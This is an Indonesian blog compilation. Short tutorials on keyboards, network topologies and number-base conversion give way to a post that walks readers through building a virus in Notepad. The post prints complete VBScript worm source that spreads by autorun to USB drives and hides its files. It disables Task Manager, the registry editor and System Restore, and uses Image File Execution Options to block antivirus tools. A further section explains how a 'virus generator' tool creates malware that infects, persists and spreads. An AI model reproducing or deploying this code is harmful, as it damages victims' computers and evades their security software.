Di bagian bawah keyboard terdapat sebuah rangkaian listrik yang disebut key matrix. Rangkaian ini terputus-putus di setiap bawah tombol. Penekanan terhadap suatu tombol keyboard akan menakibatkan rangkaian tersebut menjadi terhubung dan menimbulkan aliran listrik yang dipantau oleh prosesor computer. Kemudian prosesor tersebut mencocokkan lokasi koordinat x,y tombol yang ditekan pada peta karakter yang tersimpan dalam ROM. Dengan demikian prosesor akan mengetahui setiap karakter yang ditekan oleh pemakai.
Jika pemakai menekan lebih dari satu tombol pada waktu yang bersamaan, maka prosesor akan mencari keberadaan kombinasi tombol tersebut dalam peta karakter.
Pada karakter ini dapat ditimpa oleh perangkat lunak misalnya pada perangkat lunak yang menghendaki agar tata letak keyboard QWERTY diubah menjadi DVORAK atau kombinasi kunci tersebut mempunyai arti yang berbeda. DVORAK adalah system tata letak keyboard yang disusun berdasarkan keseringpakaian huruf.
Selain itu, keyboard juga dilengkapi dengan piranti yang mampu menyerap getaran elektronis yang diakibatkan oleh pemutus sambungan rangkaian listrik. Hal ini diperlukan agar prosesor tetap mengenalinya sebagai satu tekanan tombol saja.
Keyboard juga dilengkapi dengan typematic yang akan membuat prosesor mengenali jika pemakai memang menekan suatu tombol terus menerus untuk mengetikkan suatu huruf secara berulang.

Jenis-Jenis dan Pengertian Topoligi Jaringan

1. Topologi Bus

Topologi ini adalah topologi yang awal di gunakan untuk menghubungkan komputer. Dalam topologi ini masing masing komputer akan terhubung ke satu kabel panjang dengan beberapa terminal, dan pada akhir dari kable harus di akhiri dengan satu terminator. Topologi ini sudah sangat jarang digunakan didalam membangun jaringan komputer biasa karena memiliki beberapa kekurangan diantaranya kemungkinan terjadi nya tabrakan aliran data, jika salah satu perangkat putus atau terjadi kerusakan pada satu bagian komputer maka jaringan langsung tidak akan berfungsi sebelum kerusakan tersebut di atasi.
gambar topologi bus
Topologi ini awalnya menggunakan kable Coaxial sebagai media pengantar data dan informasi. Tapi pada saat ini topologi ini di dalam membangun jaringan komputer dengan menggunakan kabal serat optik ( fiber optic) akan tetapi digabungkan dengan topologi jaringan yang lain untuk memaksimalkan performanya.

2. Topologi Cincin

Topologi cincin atay yang sering disebut dengan ring topologi adalah topologi jaringan dimana setiap komputer yang terhubung membuat lingkaran. Dengan artian setiap komputer yang terhubung kedalam satu jaringan saling terkoneksi ke dua komputer lainnya sehingga membentuk satu jaringan yang sama dengan bentuk cincin.
gambar topologi cincin
Adapun kelebihan dari topologi ini adalah kabel yang digunakan bisa lebih dihemat. Tetapi kekurangan dari topologi ini adalah pengembangan jaringan akan menjadi susah karena setiap komputer akan saling terhubung.

3. Topologi Token Ring

Topologi ini hampir sama dengan topologi ring akan tetapi pembuatannya lebih di sempurnakan. Bisa di lihat dari perbedaan gambar.
gambar topologi token ring
Didalam gambar jelas terlihat bagaimana pada token ring kable penghubung di buat menjadi lingkaran terlebih dahulu dan nantinya akan di buatkan terminal-terminal untuk masing-masing komputer dan perangkat lain.

4. Topologi Bintang

Topologi bintang atau yang lebih sering disebut dengan topologi star. Pada topologi ini kita sudah menggunakan bantuan alat lain untuk mengkoneksikan jaringan komputer. Contoh alat yang di pakai disini adalah hub, switch, dll.
gambar topologi star
Pada gambar jelas terlihat satu hub berfungsi sebagai pusat penghubung komputer-komputer yang saling berhubungan. Keuntungan dari topologi ini sangat banyak sekali diantaranya memudahkan admin dalam mengelola jaringan, memudahkan dalam penambahan komputer atau terminal, kemudahan mendeteksi kerusakan dan kesalahan pada jaringan. Tetapi dengan banyak nya kelebihan bukan dengan artian topologi ini tanpa kekurangan. Kekurangannya diantaranya pemborosan terhadap kabel, kontrol yang terpusat pada hub terkadang jadi permasalahan kritis kalau seandainya terjadi kerusakan pada hub maka semua jaringan tidak akan bisa di gunakan.

5. Topologi Pohon

Topologi pohon atau di sebut juga topologi hirarki dan bisa juga disebut topologi bertingkat merupakan topologi yang bisa di gunakan pada jaringan di dalam ruangan kantor yang bertingkat.
gambar topologi pohon
Pada gambar bisa kita lihat hubungan antar satu komputer dengan komputer lain merupakan percabangan dengan hirarki yang jelas.sentral pusat atau yang berada pada bagian paling atas merupakan sentral yang aktiv sedangkan sentral yang ada di bawahnya adalah sentral yang pasif.

Cara Cepat Konversi Bilangan BINER, OKTAL, HEXA…

 
Pada dasarnya pengolahan teknologi digital tuh menggunakan bilagan biner…
Tapi untuk memenuhi pengolahan data yg lebih efektif dan efisien maka dibuat sistem bilangan oktal dan hexa…
Biner adalah bilangan yang hanya terdiri dari 2 bilangan, yaitu 0 dan 1…
Oktal adalah bilangan yang terdiri dari 8 bilangan, yaitu 0,1,2,3,4,5,6,7…
Hexa adalah bilangan yang terdiri dari 16 bilangan, yaitu 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F…
Permasalahan yang sering timbul adalah bagaimana caranya mengkonversi dari satu ke yang lainnya… Berikut juga operasi2 yang dapat dilakukan kepadanya…
Lansung ke contoh aja lah…
Biner: 01 kalo dalam desimal tuh maksudnya 0*21 + 1*20 = 1.
Oktal juga sama cuma tinggal ganti 2 ma angka 8, begitpun hexa cuma tinggal ganti 2 a angka 16…
Masalahnya gmana cara cepetnya kalo mau konversi dari bilangan biner ke oktal ato hexa…
Prinsionya adalah dengan memanfaatkan karakteristik bilangan itu sendiri…
Bilangan biner merupakan bilangan dengan perpangkatan max 21 , sedangkan oktal adalah bilangan dengan perpangkatan max 23 , dan hexa adalah bilangan dengan perpangkatan max 24 .
Nah maksudnya apa? Maksudnya adalah 3 bilangan di depan/belakang koma pada biner merupakan satu bilangan di depan/belakang koma pada oktal. Begitu juga kalo mau hexa, 4 bilangan di depan/belakang koma pada biner merupakan satu bilangan di depan/belakang pada hexa.
Contohnya…
Biner: 10111,1100
Oktal:
  Liat 3 bilangan depan koma: 111 dan 010 (kalo paling depan dah gak ada angka tambahin aja ma 0)
  Liat 3 bilangan belakang koma: 110 dan 000 (kalo paling depan dah gak ada angka tambahin aja ma 0)
  Konversi:111=1*22 +1*21 +1*20 =7; 010=0*22 +1*21 +0*20 =2;110=1*22 +1*21 +0*20 =6;000=0*22 +0*21 +0*20 =0.
  Jadi dalam oktal 10111,1100=27,60…
Begitu juga pada hexa…

Thursday, November 25, 2010

Membuat Virus Dengan NOTEPAD

MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD

1. Buka Notepad
2. Copy kan kode dibawah ini:

on error resume next
dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(“Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(“WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
3. Simpan dengan nama Mila.sys.vbs

Software Pembuat Virus

Cara Membuat Virus

Ingin mengetahui Cara Membuat Virus baik itu virus komputer maupun handphone mudah kok karena Cara kerjanya Membuat Virus hampir sama. Hanya saja perbedaannya pada kode pemrograman dan cara kerja virus yg telah jadi nantinya. Namun harap di ingat ya saya tidak menyarankan Cara Membuat Virus ini ditujukan untuk berbuat sesuatu hal yg merugikan orang lain, seperti menabur virus di warnet, lab kampus dll.
Kalian ingat gak dengan virus Aksika, Virus “open source” satu itu sungguh mempunyai banyak sekali jenisnya. Tidak heran karena source code-nya memang disediakan gratis di Internet, jadi siapa saja bisa dengan mudah mengubah dan merobah source codenya dan jadilah jenis baru dari Cara Membuat Virus.
computer virus Cara Membuat Virus
Berawal dari kemudahan itulah, banyak Cara Membuat Virus atau programer newbi mencoba–coba untuk membuat virus tanpa perlu usaha extra. Cuma dibutuhkan hanya pengetahuan seputar operating system dan programming Komputer saja.
Namun kemudahan itu belum seberapa, bila dibandingkan dengan menggunakan aplikasi Virus Generator. Dari namanya saja, kita sudah dapat mengira kegunaan dari aplikasi tersebut. Ya, Virus Generator merupakan aplikasi untuk dapat membuat virus secara mudah dan instan.
Bermula dari contoh sebuah virus lumayan banyak dikirimkan oleh pembaca kepada kami. PC Media Antivirus mengenalnya dengan nama Gen.FFE-Fajar, tetapi antivirus lain ada juga menyebutnya dengan nama Brontok.D. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat dari Virus Generator.
Fast Firus Engine (FFE)
Pembuat Cara Membuat Virus Generator tersebut menamakan aplikasi buatannya itu dengan nama Fast Firus Engine. Seperti terlihat pada aplikasi ataupun situs pembuatnya, ia memberitahukan bahwa aplikasi ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. Namun tetap saja, bila aplikasi ini sudah jatuh ke tangan yang salah, pasti akan digunakan untuk melakukan perusakan.

Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Dalam paketnya terdapat dua buah file, yakni Fast Firus Engine.exe dan data.ex_. Fast Firus Engine. exe merupakan aplikasi utama dalam pembuatan virusnya dan sementara file data.exe. Sebenarnya merupakan badan virus asli belum sebelum dirobah.
Ketika file Fast Firus Engine.exe dijalankan, maka Cara Membuat Virus pengguna akan dihadapkan pada sebuah interface. Anda hanya disuruh mengisikan nama virus, nama pembuat, dan pesan-pesannya. Lalu dengan menekan tombol Generate, maka jadilah virus Anda.
Cara Membuat Virus dari Generator tersebut sebenarnya sangat sederhana. Ia hanya menambahkan data yg Anda masukkan tadi ke bagian akhir file virus asli (data.ex_). Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.
Bagaimana Cara Membuat Virus Menginfeksi?
Virus hasil ciptaan FFE memang terlihat sederhana. Sama seperti Generatornya, ia juga dibuat menggunakan bahasa Visual Basic di compile dengan metode Native Code. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Virus ini memiliki ukuran tubuh asli sebesar 55.296 bytes.
Saat virus kali pertama dieksekusi, ia akan membuat beberapa file induk di beberapa lokasi. Seperti di direktori \%WINDOWS%\, akan terdapat file dengan nama.exe, Win32 exe, activex.exe, dan %virusname% (nama virus sesuai diisikan oleh sang pembuatnya pada Generator). Di \%WINDOWS%\ %system32%\ akan terdapat file copy.pif, _default.pif, dan surif.bin. Selain itu, Cara Membuat Virus juga mengubah atau membuat file Oeminfo.ini merupakan bagian dari System Properties. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE, maka pada System Properties akan terdapat tulisan “Generated by Fast Firus Engine”.
Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi menggunakan nama sama seperti file system milik Windows, seperti csrss.exe, winlogon.exe, lsass.exe, smss.exe, svchost. exe, dan winlogon.exe.
Dan tak lupa, pada root drive akan terdapat sebuah file dengan nama “baca euy.txt” berisikan pesan–pesan dari si pembuat virus. Jadi pada saat membuat virus dengan menggunakan Generator tersebut, maka pembuatnya akan disuguhkan beberapa kotak input, seperti Author Cara Membuat Virus, Name of the virus, dan Messages. Nah, isi dari kotak messages ini nantinya ditampilkan pada file “baca euy.txt” tersebut.
Setelah virus berhasil memindahkan file induknya ke dalam sistem tersebut, ia akan menjalankan file induk tadi, sehingga pada memory akan terdapat beberapa process virus, seperti csrss.exe, winlogon.exe, lsass. exe, smss.exe, svchost.exe, dan winlogon.exe. Nama process mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. Untuk membedakannya, Anda dapat melihat path atau lokasi process tersebut dijalankan. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windows yg running biasanya berasal dari direktori System32.
Cara Membuat Virus Mengubah Registry.
Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. Informasi mengenai registry diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi.
Yang ia ubah adalah seperti nilai dari item Userinit, yakni dengan menambahkan parameter ke file induk. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex.exe. Pada HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru dengan nama present. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%, username di sini merupakan nama user yang sedang aktif saat itu.
Virus hasil generate dari FFE juga mengubah shell extension untuk file .exe, yakni dengan mengubah type information dari Application menjadi File Folder. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. Dan agar dapat aktif pada safe-mode, ia pun mengubah nilai dari item SafeBoot.
Dengan menggunakan bantuan registry Image File Execution Options, virus ini juga menambahkan item baru pada section tersebut dengan nama cmd.exe, msconfi g.exe, regedit.exe, dan taskmgr.exe. Maksudnya adalah agar setiap user ketika mengakses aplikasi dengan nama file seperti itu, maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus.
Bagaimana Cara Membuat Virus Virus Menyebar?
Virus ini dapat menyebar melalui media penyimpan data seperti flash disk. Saat kita mencolokkan flash disk pada komputer yang terinfeksi, maka pada flash disk tersebut akan terdapat beberapa file baru, seperti explorer.exe, %virusname%.exe, dan msvbvm60.dll. Juga beberapa file pendukung seperti desktop.ini, autorun.inf agar ia dapatrunning otomatis pada saat mengakses flash disk tersebut.
File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.pif dan Folder.htt. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat.
Cara Virus Beraksi?
Untuk dapat bertahan hidup, virus ini pun akan mencoba untuk memblok setiap aplikasi yang tidak ia inginkan seperti tools atau aplikasi antivirus termasuk PCMAV. Sama seperti halnya dataregistry yang diubah, data mengenai aplikasi apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi.
Jadi, saat virus komputer sudah berada di memory, ia akan memantau setiap aplikasi yang diakses oleh user, yakni dengan membaca nama file dan juga caption Window. Beberapa nama program antivirus yang dicoba untuk dibloknya adalah nav.exe, avgcc.exe, njeeves.exe, ccapps.exe, ccapp.exe, kav.exe, nvcoas.exe, avp32.exe, dan masih banyak lagi yang lainnya. Termasuk beberapa aplikasi setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi.